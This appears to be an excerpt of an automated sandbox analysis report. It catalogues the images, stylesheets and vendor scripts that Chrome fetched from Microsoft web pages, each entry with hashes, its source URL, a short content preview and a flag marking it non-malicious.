                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):1249
                                                                                                                                    Entropy (8bit):7.399495937369451
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:B1B2DC6D89BBF2B0A53D6CDF539450AF
                                                                                                                                    SHA1:9FF6669EA52A2FDA867E97905E0C6BAF5F365F7E
                                                                                                                                    SHA-256:CC3C2A7ED65F088033282532D5BDB3C9CBFC73B870077EEC30AF33CC02D6344B
                                                                                                                                    SHA-512:77301DECDD7BF360015A78B97677E5A02C17F770F629F111CF2E73E0AD75FA8C89296F27BAC5EA438C645D657845FCA22117FE52D23E5670010DC5AB90915432
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Hero_BPI_icon1?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=96&hei=96&qlt=100&fmt=png-alpha&fit=constrain"
                                                                                                                                    Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D....................(iinf..........infe........av01Color....jiprp...Kipco....ispe.......`...`....pixi............av1C........colrnclx...........ipma...................mdat........`...B2..D....'...$....S=N.R.L(....#.`.A+...B......g.....6P......I.)..h4.l.a.^W...Fc.....^.BDBbW...E.z(.k/... ...B..M.>.L.B\r....".`.;.?e.5A..P.1._.Y..~d.u......X...../.>{.TNZ.K/...3...{2.z....\yl.@...b.`m..%.6<'.. P...).B/\Y_...v.3X.....]8........T.......$Q.q...../...B.....o.....C...3..>..h.......n..C......H.{....V..Kd......rU..{1Nx...t...V5N,..[.[5)R.G.{V.rt<...-.......`i...^.7)....m.nF(....0.R9>#...k....?B.s..x..a.&.......'.T..c.XG.73O.-.+t8DR..F.^fd...{..~e9b.9L.[8.......w..N...u..&.(.op.5.!%k........v.n`.q .s..t.!?..].o.......h.O..o..m.wiaT}4.( ..l..{>.E....J.....`1.x.....H..8......"c..`....u..).6.....I.....+.;.l.....&..]V..O..I....gI.)S.....Y,CN. .\.......
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (3927), with no line terminators
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):3927
                                                                                                                                    Entropy (8bit):5.20526481753379
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:50BC89D3D37D2437D09164D95B4B258C
                                                                                                                                    SHA1:27A948412D6C0E369BE353E3DDA2DD71597F2174
                                                                                                                                    SHA-256:D54FDC3901EDECCA0B9423901F357E58239DE8C56D26EA56DCBF9F932AB8C9BD
                                                                                                                                    SHA-512:62B9DF0C834BAD376644B015541BF7145FA5D5E9E87E2C36CAE6CD6F4CA01D36B6F70F5CBABB1A177583423616F6AA56F930828ADD0DFE2FA986D36551593788
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://www.microsoft.com/msonecloudapi/assets/msochead.css
                                                                                                                                    Preview:header[data-header-footprint="/OfficeProducts/teamsheader, fromService: True"] .feature h1.text-teams{margin:0}header[data-header-footprint="/OfficeProducts/teamsheader, fromService: True"] .feature .card-body .link-group.link-group-col-2{margin-top:35px}[data-component-id=d86b06c2fa504a3e1bfc37d37bc0eee7] .nav-bar{z-index:500}#highlight-ocf2a1 .card-background{margin-top:0;margin-bottom:0}#highlight-ocf2a1 .card-background>img,#highlight-ocf2a1 .card-background>picture{height:100%;width:100%}#layout-container-uid93df .row>.col{align-self:unset!important}@media (min-width:860px){#layout-container-uid93df .row>.col{display:flex}#layout-container-uid93df .col.align-self-start.text-md-left.no-gutters.mb-4.mb-md-0{padding-bottom:1.5rem!important}}:not(.container)>[data-component-id="9ff80f278e2186de9dc83ecbc7bd5dbe"].image-tabs>.row{margin-left:0;margin-right:0}:not(.container)>[data-component-id="9ff80f278e2186de9dc83ecbc7bd5dbe"].image-tabs>.row [class*=col-]{padding-left:0;padding-right
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):406
                                                                                                                                    Entropy (8bit):4.645093417199183
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:F9F2395C582FA601707B7A5DFAE9F05F
                                                                                                                                    SHA1:27B15AECD0BFDD3B25556AC00755856D4D331E0D
                                                                                                                                    SHA-256:D7D6D06624D4BDF6935B848DF342CE322D02B58D12BF12149DF92D557E5E9BC4
                                                                                                                                    SHA-512:F3378927D96B0B172981A821A8C2A16D0F397ED92E835B7C46316FC48350402D972A5411F0FA4C260F205AA1F7917F83F8247BF8A62C7F22E0076B168275B1E9
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://www.microsoft.com/etc.clientlibs/cascade.component.authoring/clientlibs/clientlib-uhf.min.ACSHASHf9f2395c582fa601707b7a5dfae9f05f.css
                                                                                                                                    Preview:.c-uhfh .c-action-trigger.glyph-shopping-cart span:not(.shopping-cart-amount),.c-uhfh .c-action-trigger.glyph-shopping-bag span:not(.shopping-cart-amount){line-height:48px !important}..c-uhfh .c-action-trigger.glyph-shopping-cart:after,.c-uhfh .c-action-trigger.glyph-shopping-bag:after{line-height:43px}..c-uhfh.c-sgl-stck .c-search button{line-height:18px}..msame_Header_name{line-height:44px !important}
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (32098)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):143130
                                                                                                                                    Entropy (8bit):5.330341741940889
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:B2193EE3D1A572C4DE0275BB103C5293
                                                                                                                                    SHA1:802AB2E55CE99CE6F37253692F7CFD9229EA65A4
                                                                                                                                    SHA-256:8EE3C3B99F088F30D5C2CAB98F1688E24D5F9333A164C7610310779EF0EC522A
                                                                                                                                    SHA-512:E79020F2B363A5D4059745B16597B7796EE24DBDE0AFFE331BE611D149B960630839F9D757938C969F4A2D00CF49995F3152D952A32D7A3E473BC4B8CD10C825
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:/**!.. @license. handlebars v4.7.7..Copyright (C) 2011-2019 by Yehuda Katz..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARI
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (566)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):61208
                                                                                                                                    Entropy (8bit):5.486865205392623
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:F381D5147C85EE687EA8FBEF32C83D37
                                                                                                                                    SHA1:EB654ABAF1DF5CCB830763D5A40140B5C093C49F
                                                                                                                                    SHA-256:2D0832B29F1B3347C4B5046C373A635884B76ABAF2DE3FF650EE74D8B46F001E
                                                                                                                                    SHA-512:CD6B4DEB925037A6C0CF4BAA5AB600891139D99BFB9173D3F3DD4660D281A6266B5709D53770395E7459D9D2060E37F06295E8F9719A21F3EA8433D9E2206E65
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://www.microsoft.com/etc.clientlibs/cascade.component.authoring/clientlibs/clientlib-polyfills.min.ACSHASHf381d5147c85ee687ea8fbef32c83d37.js
                                                                                                                                    Preview:/*. Copyright (C) 2013-2015 by Andrea Giammarchi - @WebReflection.. Permission is hereby granted, free of charge, to any person obtaining a copy. of this software and associated documentation files (the "Software"), to deal. in the Software without restriction, including without limitation the rights. to use, copy, modify, merge, publish, distribute, sublicense, and/or sell. copies of the Software, and to permit persons to whom the Software is. furnished to do so, subject to the following conditions:.. The above copyright notice and this permission notice shall be included in. all copies or substantial portions of the Software... THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR. IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,. FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE. AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER. LIABILITY, WHETHER IN AN
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (44755), with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):44755
                                                                                                                                    Entropy (8bit):5.388052626258843
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:E3E68C940226C4D15D51792C17ADBE9C
                                                                                                                                    SHA1:0B030255624C75DD77B015B7FC77949D5E01CD63
                                                                                                                                    SHA-256:9A8D16CF69B04F17BF869FDC4B81588CDE13C410F37E079820B54E1BAED4BAC7
                                                                                                                                    SHA-512:F1CB89AFA14C82AA430A62FE5A829003507778DC3292C02A1B580B84AF9465C47A0B72501C1B4E64DE3882837E53123433EDA63B7828F3B41D206E8E9AE99B3F
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:window.lpTag=window.lpTag||{};lpTag.firstParty=!0;window.lpTag=window.lpTag||{};window.lpTag.lzString=window.lpTag.lzString||(()=>{var y=String.fromCharCode,r="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",n="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+-$",o={};function a(e,t){if(!o[e]){o[e]={};for(var r=0;r<e.length;r++)o[e][e.charAt(r)]=r}return o[e][t]}var i={compressToBase64:function(e){if(null==e)return"";var t=i._compress(e,6,function(e){return r.charAt(e)});switch(t.length%4){default:case 0:return t;case 1:return t+"===";case 2:return t+"==";case 3:return t+"="}},decompressFromBase64:function(t){return null==t?"":""==t?null:i._decompress(t.length,32,function(e){return a(r,t.charAt(e))})},compressToUTF16:function(e){return null==e?"":i._compress(e,15,function(e){return y(e+32)})+" "},decompressFromUTF16:function(t){return null==t?"":""==t?null:i._decompress(t.length,16384,function(e){return t.charCodeAt(e)-32})},compressToUint8Array:functio
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ISO Media, AVIF Image
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):22748
                                                                                                                                    Entropy (8bit):7.97936926396813
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:E8842769971110AD7D5770549FD2147F
                                                                                                                                    SHA1:51F4878C2E87CC489106C97B109E571C432BB37B
                                                                                                                                    SHA-256:E4E089B3C74831C7A49A60C22F89BA73F4E46088282E2196298BA8B9FF6B840A
                                                                                                                                    SHA-512:C59A7A36D84AACA95CE09F33D1AAF1214EAE7B13327CF9E577E4E2693E5C00CFE46DBE604BEAB6F9768F5C4F9E2C277691CED141C8C1C1269A2CA26B320D16BE
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Hero_PBI_opt2?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=3200&hei=1000&qlt=100&fit=constrain"
                                                                                                                                    Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D...............W....(iinf..........infe........av01Color....jiprp...Kipco....ispe................pixi............av1C........colrnclx...........ipma.................W.mdat......j......B2...D........E..S8%.Qm..D+....g...L.A...%....GQQgMA...A,.o..y.)..TH.._O..=.....<?.78....S.....mp.W.vo ..../..n.}.\..^..[;....R.....Ol.U.A..)*..].jEhH.&.......2.Ea....m^...c".!5.(.i.b.y# j.Qu)l..i.....@.......t..,h<.0j..t.......IC.4....._3.Z.S...W.+.W.f..U......C...Yd.."....q.[.'..M.K...M..Zt..Z.PG..(.]b.Ip..:.Vm.T......eFE].....Yb-.K.kV.p..-Y.T.._`$...%..}..P.l....%=.'....K..8......B.9....1N.+...7..6u...G_1...>u+(.[..g..e.CF...f.l.Y.9hK..w..3.G..K9?...m_.n?...y.{.M..v.....B..[8.....B..N....t._=.Y.A..4..w.a...z.....Iw.|%.....m....Q......C.x$...)g.^.<.}.yCx8=`i....U.b......f.c.o..^S.)...*$!x5.......[V...?..|.......)5p.Wz1.:.t.1..d.Ko3[..u6............#W..x)0...\.5..&E.
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):422
                                                                                                                                    Entropy (8bit):4.615395128455073
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:2ADD065651AFB45E8C80967DD7B86A41
                                                                                                                                    SHA1:32A99770B83F754338EDF886571A91CEDD404F70
                                                                                                                                    SHA-256:3ECC4A2E8123EAD290D257F820C1CDAFB484A990B5D71AF3F6406CC85978B21B
                                                                                                                                    SHA-512:F0C2500211E649627495B98D3F040C834B4B3E53FDB31F78C7BED6D4421A70968BF5565BD57A2916423D2CE093FBB188AE78364F13DB31E2E5F589B043F90DFC
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-product-pricing.min.ACSHASH2add065651afb45e8c80967dd7b86a41.css
                                                                                                                                    Preview:[data-oc-product]:not([data-oc-product*=Success])>*{display:none !important}.[data-oc-product]:not([data-oc-product*=Success]) [data-oc-product="not-available"],[data-oc-product]:not([data-oc-product*=Success]) [data-oc-product="not-available"] *{display:block !important}.[data-ocr-product]:not([data-ocr-product*=Success]):has(.sku__unavailable) [data-oc-product]:not([data-oc-product*=Success]){display:none !important}
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (2842)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):2989
                                                                                                                                    Entropy (8bit):5.314178376412353
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:618AB73E3B9F0D03DC528FEEFA57DC75
                                                                                                                                    SHA1:644DB76EB2D00DF924B17CBE223758FCF360AC56
                                                                                                                                    SHA-256:9C79F3072208052CD30DAF1CF244177B70F65F782633BEC3ECD4E2601C6281C1
                                                                                                                                    SHA-512:ECD3346FEDE394726941E1C0E1AE3B83C140D1653B15A7AC9F93F7E0808663DF23FC4423A65A869F7DF19EF3A5C54DB8B59C6C0AC82078F30F832C165EC83828
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://assets.adobedtm.com/5ef092d1efb5/2537c33769cb/fbfb7616f9aa/RC1fc64c69f66543f7902881d9fba93b30-source.min.js
                                                                                                                                    Preview:// For license information, see `https://assets.adobedtm.com/5ef092d1efb5/2537c33769cb/fbfb7616f9aa/RC1fc64c69f66543f7902881d9fba93b30-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/2537c33769cb/fbfb7616f9aa/RC1fc64c69f66543f7902881d9fba93b30-source.min.js', "!function(){for(var w=[[/\\w{2}-?(?:\\w{2}|\\w{4}-\\w{2})?\\/(?:microsoft-cloud)\\/?.*/gi,\"8rugvc69mo\"],[/\\w{2}-?(?:\\w{2}|\\w{4}-\\w{2})?\\/(?:microsoft-teams)\\/?.*/gi,\"8j6z5n8me5\"],[/\\w{2}-?(?:\\w{2}|\\w{4}-\\w{2})?\\/(?:microsoft-365)\\/?.*/gi,\"8qumfcbe49\"],[/\\w{2}-?(?:\\w{2}|\\w{4}-\\w{2})?\\/(?:windows-365)\\/?.*/gi,\"8j705rlc54\"],[/\\w{2}-?(?:\\w{2}|\\w{4}-\\w{2})?\\/(?:microsoft-viva)\\/?.*/gi,\"8j70e2bszm\"],[/\\w{2}-?(?:\\w{2}|\\w{4}-\\w{2})?\\/(?:security)\\/?.*/gi,\"8j70lgy2cr\"],[/\\w{2}-?(?:\\w{2}|\\w{4}-\\w{2})?\\/(?:trust-center)\\/?.*/gi,\"8j70lgy2cr\"],[/\\w{2}-?(?:\\w{2}|\\w{4}-\\w{2})?\\/(?:industry)\\/?.*/gi,\"8j70sts7ed\"],[/\\w{2}-?(?:\\w{2}|\\w{4}-\\w{2})?\\/(?:f
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (27332), with no line terminators
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):27332
                                                                                                                                    Entropy (8bit):5.48233759733871
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:4502CFFD9A049B7D23CF17CC2DE9B80D
                                                                                                                                    SHA1:2150B19E2378B68F766A958A1408E599C556BE44
                                                                                                                                    SHA-256:2823FBFA7B9256867E21AF1ECBFBB98583C8EF0E0B495F6F01D862EF58E3D93D
                                                                                                                                    SHA-512:28CE499A0787323277957763ADE1B7F5341E547CF82ECE2E4B7CD4F35B250B48F87596CF2E580D7400FE5FB35D73493D932781E851E254753A61EF123EB2EA32
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://lptag.liveperson.net/tag/tag.js?site=60270350
                                                                                                                                    Preview:window.lpTag=window.lpTag||{};lpTag.taglets=lpTag.taglets||{};lpTag._tagv="4.1.13";!function(a,b){function c(c,d,e){b._logcnt=b._logcnt||0;H(c,d,e,b._logcnt);if("undefined"!=typeof a.lpTaglogListeners&&a.lpTaglogListeners.constructor===Array)for(var f=0;f<lpTaglogListeners.length;f++)try{lpTaglogListeners[f](c,d,e,b._logcnt)}catch(g){H("Exception="+g.message+" msg="+c,d,e,b._logcnt)}b._logcnt++}function d(a){if(a)for(var b=0;b<a.length;b++)qa[a[b].service]=a[b].baseURI}function e(){for(var a=Ga.PRODUCTION,c=b.ovr&&b.ovr.domain,d=0;d<Ha.length;d++)if(Ha[d].tagDomain===c){a=Ha[d].env;break}return a}function f(a){var c;a=a||e();if("string"==typeof a)for(var d=0;d<Ha.length;d++)if(Ha[d].env===a&&(b.tagletsPrecomputed&&Ha[d].tagletsPrecomputed||!b.tagletsPrecomputed&&!Ha[d].tagletsPrecomputed)){c=Ha[d].tagDomain;break}return c}function g(a){var b=qa[a],c="ALL";return b?b:qa[c]}function h(){return qa}function i(a){return l(ra,a)}function j(a){return l(sa,a)}function k(a,b){for(var c in b)b.h
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (65397)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):140778
                                                                                                                                    Entropy (8bit):5.44675798903284
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:94FEEC31F6FD531C80B08FAE26EB275C
                                                                                                                                    SHA1:96F904FC6D751F8CFBA18D506CB1067CB0AC25FC
                                                                                                                                    SHA-256:1569DD95C870F769B2BC3909C52C08303956BEF7DFC288402D3B8BB13148BC10
                                                                                                                                    SHA-512:EBFC643C65EA79F4930AE22AA752C79252B91D97B0A5BB4407D262BAF76C2BA84A05D0064E095D4DFC9BBE727B38428FF1D741C045F0B5A85ED38ED0A1A3C3C3
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://js.monitor.azure.com/scripts/c/ms.analytics-web-3.min.js
                                                                                                                                    Preview:/*!. * 1DS JS SDK Analytics Web, 3.2.18. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var i,n=typeof globalThis!=n?globalThis:e||self,r={},e="__ms$mod__",a={},o=a.esm_ms_analytics_web_3_2_18={},c="3.2.18",u="oneDS3",s=(s=n)[u]=s[u]||{},l=(l=n)[u="oneDS"]=l[u]||{},n=s[e]=s[e]||{},f=n.v=n.v||[],u=l[e]=l[e]||{},d=u.v=u.v||[];for(i in(u.o=u.o||[]).push(a),t(r),r)s[i]=r[i],f[i]=c,l[i]=r[i],d[i]=c,(o.n=o.n||[]).push(i)}}(this,function(n){"use strict";!function(e,t,n){var i=Object.defineProperty;if(i)try{return i(e,t,n)}catch(r){}typeof n.value!==undefined&&(e[t]=n.value)}(n,"__esModule",{value:!0});var c="function",u="object",fe="undefined",f="prototype",s="hasOwnProperty",l=Object,g=l[f],v=l.assign,y=l.create,e=l.defineProperty,T=g[s],I=null;function b(e){e=!1===(e=void 0===e||e
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (2656), with CRLF line terminators
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):2777
                                                                                                                                    Entropy (8bit):5.68092311674343
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:696BD01B5BBC0C1A086067C50833B2C0
                                                                                                                                    SHA1:123FAD580357971CBD5A393EACE6A7D219502FC5
                                                                                                                                    SHA-256:1A0CDFEC6E0FBD2F7D17071EA94D8B39FCCFEA7C940F59440A2553967E31F926
                                                                                                                                    SHA-512:7811A2B9109F86EE580F4D1190E400B55E952456A97C522D87E6AA72E02B78E1AF1250664B232C548E3266294E489B8308D85CE28C000609A36232184EF2A445
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://fpt2.microsoft.com/Clear.HTML?ctx=Ls1.0&wl=False&session_id=d3b95e04-b5cb-465e-9347-25773be09c41&id=87b13f09-d816-4cfa-90cc-67a80d978979&w=8DD1EB7EEAF1290&tkt=H3ihr9e92IdW6yd1ZgQ9S5rgl8oOzJXlGHKxtZ4bVKpvq6%252fATrRNPOzEVmuod%252bCuv8DX06rzw%252b14Ud0hu7ryh3aMG4OJWG%252fMvYoEFk8plxOb%252fgSaPwaTx0SSn93jDLMov5x7k5NxZ6fqXZQDvy9m23gbi13ElaVZIJoVs3naFWtnR%252fZw98b28%252fipilAmExdEKT9jSduAgY7IvOGsLVqcTqOzWE%252fIykY%252b7PyZeX00flfxSuxAcgVeEYr01GRuqTDjkVZgTZWwH189ExDWJto15CrVkl4GFmKt10ztyCuDTbhx9ZFnkxJpwm%252bB2tqKJAvL&CustomerId=02C58649-E822-405B-B6C3-17A7509D2FCC
                                                                                                                                    Preview:<!DOCTYPE html>..<html xmlns="http://www.w3.org/1999/xhtml">..<head>.. <title></title>..</head>..<script>function BaseStamp() { this.GetStorageQsInfo = function () { if (window.localStorage) { var n = window.localStorage.getItem(lsKey); var lsupd = "False"; if (lsupd === "true" && n) { var xhr = new XMLHttpRequest(), method = "GET", url = target + "updatels.html?ofid=" + n + "&session_id=" + sid + "&CustomerId=" + cid; xhr.open(method, url, true); xhr.onreadystatechange = function () { if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) { var update = xhr.responseText; if (update && update.toLowerCase() === "true") { window.localStorage.setItem(lsKey, id); } } }; xhr.send(); } if (n && n != null && n != "" || (window.localStorage.setItem(lsKey, id), n = id), id != n) return "session_id=" + sid + "&CustomerId=" + cid + "&fid=" + id + "&ofid=" + n + "&w=" + ticks + "&auth=" + encodeURIComponent(authKey) } return "" }; this.newXMLHttp = function () { var n = null; return
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):206
                                                                                                                                    Entropy (8bit):5.069458334688229
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:131D95CF2EC0E511B73B264FA0C84059
                                                                                                                                    SHA1:10A0E2E7C996B7C482B64B953F0A443672A55CF7
                                                                                                                                    SHA-256:44A041D41D7F1E7C09AFBCF26471F2370C7182C915633049DDD27229DDBE2C33
                                                                                                                                    SHA-512:6D90DB6F32278A6507158107EC23F48C700DF46103F1860B9DE0305662A0755CBCF52EC1F35D9289A4BFEBF6C4C88D1E5C2C76E776C12BCB56A8051AA3343EB1
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://www.microsoft.com/etc.clientlibs/microsoft/components/content/inline-video/v2/cascade-media-player/clientlibs/site.min.ACSHASH131d95cf2ec0e511b73b264fa0c84059.css
                                                                                                                                    Preview:/*!..To avoid conflict with MWF styles, added a wrapper class.. */.ump-container{max-width:100%}..ump-sm{width:800px}..ump-md{width:1200px}..ump-lg{width:1600px}..ump-xl{width:1920px}..ump-fill{height:100%}
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ISO Media, AVIF Image
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):163516
                                                                                                                                    Entropy (8bit):7.998777935374207
                                                                                                                                    Encrypted:true
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:68D1EB1D25065C1BF954BDDEB8E04B56
                                                                                                                                    SHA1:1B931870F88161A9830BABE956EE5D889C486008
                                                                                                                                    SHA-256:EDBB53CC179C808EF9290A475D62A37600206B2C55A827370C700444880DEDCC
                                                                                                                                    SHA-512:AF0564F02E3C8336596BC6F1749AACE55C27EECB12FC3E8E078618251C0D02D1132231FC9F4A0A09DE5E762A6E2315442E1DF905A73C6E4F291F5E344C20F847
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Resouces-01-416X179?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=1010&hei=433&qlt=95&fmt=png-alpha&fit=constrain"
                                                                                                                                    Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D...............}....(iinf..........infe........av01Color....jiprp...Kipco....ispe................pixi............av1C........colrnclx...........ipma.................}.mdat.....&?....4..2....0.....E......>>_}..&...8...S..P...?d j......BQ4....<.p.|Lk..gI>.L..F... .)..kY2....._.r..NO....B...5..1/...f.v.6F...;........Y..+..;....|l..n.S...'.Y....m.`.8.4.A..P...0!i}..?...Aj..ll....F+..5...J......B.....lc-..^.....@...h.~.eb.U.{(.C%..k.`.#..,N7...92.(.T....s.q......1(w.."....p..\...\...g.}\d...wJ...b|Pg.f.....n.Z...o.^.r..n*...:.EG......Q..TF...F......eb0....H.Hx....m;...u.5.F!4..r..6./GHG.............X..]......>..;....B........0U34....j..(.R.JH.'.nFa.....H..1R........&....,..Y3.v+?.z@....v...l...M.$.3......si...{.%..;.'...GG?<I..$..r].:<9....%c.kZ....C...[.P......Em.s.d.V...D.....J../...'..KV.F.z.(......`.<.V.}.....Z<..Y..P.ai2.Gn.l.?.!.
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (9606), with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):9606
                                                                                                                                    Entropy (8bit):5.189330251800402
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:A6802AB98C4236C76CF9D79D73C108F8
                                                                                                                                    SHA1:069A5381EF4081818B8CB0B2CA5E0427052DA092
                                                                                                                                    SHA-256:3B0944DFEA209566C3A89112514FFA483A8518BCDD8B3F0FAB9AD70A08215A97
                                                                                                                                    SHA-512:019DF91CB63A5D600C0FFB953E7A79EC3BC3FB82E372B931A06EF8F9856C9A6021EC9068B36EC7214A3F38326962505BC6E25886FFB3E6CAB113068BCE729A94
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
